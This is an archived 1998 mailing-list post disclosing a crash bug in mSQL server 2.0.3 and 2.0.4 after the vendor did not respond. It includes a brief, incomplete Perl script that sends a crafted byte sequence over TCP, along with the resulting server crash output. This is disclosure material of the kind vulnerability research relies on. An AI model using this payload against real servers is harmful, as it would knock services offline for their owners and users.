mSQL dummies

From: Peter Boutzev (boutzevat_private)
Date: Wed Nov 11 1998 - 10:09:27 PST

  • Next message: Sam R. Akhtar: "NT DNS hacked ... ?"

    Hello to everyone,
    That is: in function "msqlConnect()" , libmsql checks the user name of
    the logged user. Ok, let's try to connect to an mSQL server without sending it.
    I thought that my prog did not work, because it was unable to connect the mSQL
    server. After several retries, I understood that the server was gone away. I
    restarted it, and made a new connection. Here is what happens:
    Hit by a sig 11
    Forced server shutdown due to bad signal!
    IOT trap/Abort
    I discovered this where I was doing an mSQL Clinent with an old
    libmsql.dll under Windows. I have no time to look further on the problem,
    and I am useing mySQL now. Anyway here is a small cut of code that demonstrates
    the problem.
    ------------------------- CUT HERE --------------------------
    use IO::Socket;
    $host = @ARGV[0];
    $port = @ARGV[1];
    sub Connect {
            $sock = IO::Socket::INET->new(
                Proto    => "tcp",
                PeerAddr => $host,
                PeerPort => "msql($port)",
                ) or die "Cannot connect !";
            print $sock "\x05\x00\x00\x00\x00\x0A\x03\x31\x3A\x0A";
            while (<$sock>) {
            printf "Y0!-y0-Y0!\n";
    ------------------------------ END ---------------------------
    I don't know was this discussed here before, ot not, I informed Hughes
    Technologies 5 months ago, and they did not respond me. Maybe in the new
    mSQL 2.0.5 or later the bug was patched, I have no time to test it. 2.0.3
    and 2.0.4 seem to be vulnerable. I am not sure about gaining remote access
    with this. Anyway, I thought that it should be posted here...

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